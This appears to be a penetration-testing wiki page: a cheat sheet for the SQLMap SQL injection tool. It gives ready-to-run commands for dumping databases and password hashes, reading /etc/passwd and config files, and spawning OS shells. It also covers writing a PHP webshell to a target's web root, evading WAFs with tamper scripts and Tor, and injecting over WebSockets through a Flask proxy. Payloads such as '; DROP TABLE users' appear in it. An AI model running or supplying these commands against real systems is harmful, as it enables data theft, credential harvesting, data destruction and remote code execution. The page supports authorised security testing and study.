SQLMap

Automated SQL injection detection and exploitation tool.

Install: apt install sqlmap or git clone https://github.com/sqlmapproject/sqlmap.git

Quick Reference

# Basic scan
sqlmap -u "http://target.com/page.php?id=1" --batch

# From Burp/ZAP request file
sqlmap -r request.txt --batch

# POST data
sqlmap -u "http://target.com/login" --data="user=admin&pass=test" --batch

# With cookies
sqlmap -u "http://target.com/page.php?id=1" --cookie="PHPSESSID=abc123"

# Enumerate databases
sqlmap -u "http://target.com/page.php?id=1" --dbs

# Enumerate tables
sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables

# Dump table
sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump

# OS shell
sqlmap -u "http://target.com/page.php?id=1" --os-shell

Supported DBMS

DBMS

MySQL

Oracle

PostgreSQL

MS SQL Server

SQLite

IBM DB2

MS Access

Firebird

Sybase

SAP MaxDB

MariaDB

CockroachDB

SQLi Types (--technique=BEUSTQ)

Char

Technique

Example Payload

B

Boolean-based blind

AND 1=1

E

Error-based

AND GTID_SUBSET(@@version,0)

U

Union query-based

UNION ALL SELECT 1,@@version,3

S

Stacked queries

; DROP TABLE users

T

Time-based blind

AND 1=IF(2>1,SLEEP(5),0)

Q

Inline queries

SELECT (SELECT @@version) FROM

Common Flags

Essential

--batch              # Non-interactive (auto-accept defaults)
-u URL               # Target URL with parameter
-r FILE              # Read request from file
--data="param=val"   # POST data
-p PARAM             # Specific parameter to test

Enumeration

--dbs                # Enumerate databases
--tables             # Enumerate tables
--columns            # Enumerate columns
--dump               # Dump table data
--dump-all           # Dump all databases
-D DB                # Specify database
-T TABLE             # Specify table
-C COL1,COL2         # Specify columns

Info Gathering

--banner             # DBMS banner
--current-user       # Current user
--current-db         # Current database
--hostname           # Server hostname
--is-dba             # Check if DBA privileges
--users              # Enumerate users
--passwords          # Enumerate password hashes

Tuning

--level=1-5          # Test thoroughness (default 1)
--risk=1-3           # Risk of tests (default 1)
--technique=BEUSTQ   # SQLi techniques to use
--threads=10         # Number of threads

OPSEC

--random-agent       # Random User-Agent
--mobile             # Mobile User-Agent
--user-agent="..."   # Custom User-Agent
--tor                # Use Tor
--check-tor          # Verify Tor is working
--proxy="http://127.0.0.1:8080"

Request Options

Cookies & Headers

--cookie="PHPSESSID=abc123; security=low"
-H "X-Forwarded-For: 127.0.0.1"
-H "Authorization: Bearer token123"

HTTP Method

--method=PUT
--method=DELETE

Mark Injection Point

Use * to mark specific parameter(s) to test. You can mark more than one (e.g. cookie and POST body); sqlmap will test each.

sqlmap -u "http://target.com/api" --data="id=1*&name=test"
sqlmap -u "http://target.com/page?id=1*"
# From request file: add * in the value you want to test (e.g. username=jack&country=Sweden* and cookie user=HASH*)
sqlmap -r index.req --batch
# With time-based blind, parameter #2 (e.g. country) may be the only injectable one; --os-shell/--sql-shell may fail but --file-write can still work

From Burp Request File

# Save request to file from Burp (Right-click > Copy to file)
sqlmap -r request.txt --batch

# Specify DBMS when known (faster, fewer false positives)
sqlmap -r login.req --batch --dbms mysql

Example request file:

GET /page.php?id=1 HTTP/1.1
Host: target.com
Cookie: PHPSESSID=abc123
User-Agent: Mozilla/5.0

Database Enumeration

Step-by-Step

# 1. Find databases
sqlmap -u "URL" --dbs

# 2. Find tables in database
sqlmap -u "URL" -D dbname --tables

# 3. Find columns in table
sqlmap -u "URL" -D dbname -T tablename --columns

# 4. Dump specific columns
sqlmap -u "URL" -D dbname -T tablename -C username,password --dump

# 5. Dump with conditions
sqlmap -u "URL" -D dbname -T tablename --where="id>10" --dump

# 6. Dump rows range
sqlmap -u "URL" -D dbname -T tablename --start=1 --stop=10 --dump

Search for Data

# Search for tables containing "user"
sqlmap -u "URL" --search -T user

# Search for columns containing "pass"
sqlmap -u "URL" --search -C pass

Schema

# Get full database schema
sqlmap -u "URL" --schema

File Operations

Read Files

sqlmap -u "URL" --file-read="/etc/passwd"
sqlmap -u "URL" --file-read="/var/www/html/config.php"

# File saved to: ~/.sqlmap/output/target.com/files/

Write Files

# Create shell locally first
echo '<?php system($_GET["cmd"]); ?>' > shell.php

# Write to target
sqlmap -u "URL" --file-write="shell.php" --file-dest="/var/www/html/shell.php"

# Verify
curl "http://target.com/shell.php?cmd=id"

More stable PHP webshell (Kali): Use wright.php instead of a one-liner when you have file-write (e.g. SQLi + DBA). It often behaves better than a simple ?cmd= shell (cleaner output, fewer "Cannot execute blank command" issues):

# Location on Kali: /usr/share/webshells/php/wright.php
sqlmap -r request.req --file-write="/usr/share/webshells/php/wright.php" --file-dest="/var/www/html/sb.php" --batch
# Then visit http://TARGET/sb.php (or whatever path you used)

Works with time-based blind SQLi; file-write can still succeed when --os-shell / --sql-shell do not.

OS Command Execution

Interactive Shell

sqlmap -u "URL" --os-shell

# If UNION fails, try error-based
sqlmap -u "URL" --os-shell --technique=E

SQL Shell

sqlmap -u "URL" --sql-shell

WAF Bypass

Anti-CSRF Token

sqlmap -u "URL" --csrf-token="csrf-token"

Randomize Parameter

sqlmap -u "http://target.com/?id=1&rp=12345" --randomize=rp

Calculated Parameter (e.g., hash)

sqlmap -u "http://target.com/?id=1&h=c4ca4238a0b923820dcc509a6f75849b" \
       --eval="import hashlib; h=hashlib.md5(id.encode()).hexdigest()"

Tamper Scripts

# Single tamper
sqlmap -u "URL" --tamper=space2comment

# Chained tampers
sqlmap -u "URL" --tamper=between,randomcase,space2comment

# List all tamper scripts
sqlmap --list-tampers

Common Tamper Scripts

Script

Description

space2comment

Replace spaces with /**/

between

Replace > with NOT BETWEEN 0 AND

randomcase

Random case keywords

equaltolike

Replace = with LIKE

base64encode

Base64 encode payload

charencode

URL encode characters

space2plus

Replace spaces with +

space2hash

Replace spaces with # (MySQL)

percentage

Add % before each character

modsecurityversioned

MySQL versioned comments

Other Bypass Options

--random-agent        # Bypass user-agent blacklist
--chunked             # Chunked transfer encoding
--hpp                 # HTTP Parameter Pollution
--skip-waf            # Skip WAF detection

Troubleshooting

All parameters not injectable

When sqlmap reports "all tested parameters do not appear to be injectable", try increasing thoroughness and WAF bypass:

# Higher level/risk (more payloads; risk 3 can modify data)
sqlmap -r request.req --batch --level=3 --risk=2

# With tamper (e.g. space2comment for WAF)
sqlmap -r request.req --batch --tamper=space2comment

Parse Errors

sqlmap -u "URL" --parse-errors

Save Traffic

sqlmap -u "URL" -t /tmp/traffic.txt

Verbose Output

sqlmap -u "URL" -v 3      # Show payloads
sqlmap -u "URL" -v 6      # Full HTTP traffic

Through Proxy

sqlmap -u "URL" --proxy="http://127.0.0.1:8080"

Specify Prefix/Suffix

sqlmap -u "URL" --prefix="%'))" --suffix="-- -"

Level & Risk Settings

Level

Tests

Default - basic tests

Add Cookie testing

Add User-Agent/Referer testing

More payloads

Maximum - all boundaries

Risk

Tests

Default - safe tests

Add heavy time-based

Add OR-based (can modify data!)

# Maximum testing (slow, noisy)
sqlmap -u "URL" --level=5 --risk=3

SQLMap Over WebSockets

SQLMap doesn't natively support WebSockets. Use a Flask proxy to translate HTTP requests to WebSocket messages.

Flask Proxy Script

# ws_proxy.py
from flask import Flask, request
from websocket import create_connection

app = Flask(__name__)

ws_url = "ws://target.com:9091"  # WebSocket endpoint

@app.route("/")
def handle():
    query = request.args.get('query')
    
    ws = create_connection(ws_url)
    
    # Modify payload format as needed for target
    payload = '{"id":"%s"}' % query
    
    ws.send(payload)
    res = ws.recv()
    ws.close()
    
    return res if res else "no response"

if __name__ == "__main__":
    app.run(debug=False)

Setup & Run

# Setup
python3 -m venv .venv
source .venv/bin/activate
pip install flask websocket-client

# Run proxy
flask run
# or: python ws_proxy.py

# Now use sqlmap against local proxy
sqlmap -u "http://localhost:5000/?query=1" --batch --dbs

Common WebSocket Payload Formats

# JSON with id parameter
payload = '{"id":"%s"}' % query

# JSON with ticket/search
payload = '{"ticket":"%s"}' % query

# Plain text
payload = query

Reference: https://rayhan0x01.github.io/ctf/2021/04/02/blind-sqli-over-websocket-automation.html

Useful One-Liners

# Quick DB dump
sqlmap -u "URL" --dump --batch

# Get shell fast
sqlmap -u "URL" --os-shell --batch --technique=E

# Dump passwords and crack
sqlmap -u "URL" --passwords --batch

# Full auto-pwn
sqlmap -u "URL" --all --batch

# Crawl and test forms
sqlmap -u "http://target.com/" --forms --crawl=2 --batch

Output Files

Results saved to: ~/.sqlmap/output/<target>/

~/.sqlmap/output/target.com/
├── dump/           # Dumped tables (CSV)
├── files/          # Downloaded files
├── log             # Session log
└── session.sqlite  # Session data (resume scans)

Session Management

# Resume previous session
sqlmap -u "URL"  # Auto-resumes if session exists

# Fresh scan (ignore session)
sqlmap -u "URL" --flush-session

# Specify output directory
sqlmap -u "URL" --output-dir=/tmp/sqlmap_out

PreviousOWASP ZAP NextPowerView

Last updated 23 days ago

hashtagQuick Reference

hashtagSupported DBMS

hashtagSQLi Types (--technique=BEUSTQ)

hashtagCommon Flags

hashtagEssential

hashtagEnumeration

hashtagInfo Gathering

hashtagTuning

hashtagOPSEC

hashtagRequest Options

hashtagCookies & Headers

hashtagHTTP Method

hashtagMark Injection Point

hashtagFrom Burp Request File

hashtagDatabase Enumeration

hashtagStep-by-Step

hashtagSearch for Data

hashtagSchema

hashtagFile Operations

hashtagRead Files

hashtagWrite Files

hashtagOS Command Execution

hashtagInteractive Shell

hashtagSQL Shell

hashtagWAF Bypass

hashtagAnti-CSRF Token

hashtagRandomize Parameter

hashtagCalculated Parameter (e.g., hash)

hashtagTamper Scripts

hashtagCommon Tamper Scripts

hashtagOther Bypass Options

hashtagTroubleshooting

hashtagAll parameters not injectable

hashtagParse Errors

hashtagSave Traffic

hashtagVerbose Output

hashtagThrough Proxy

hashtagSpecify Prefix/Suffix

hashtagLevel & Risk Settings

hashtagSQLMap Over WebSockets

hashtagFlask Proxy Script

hashtagSetup & Run

hashtagCommon WebSocket Payload Formats

hashtagUseful One-Liners

hashtagOutput Files

hashtagSession Management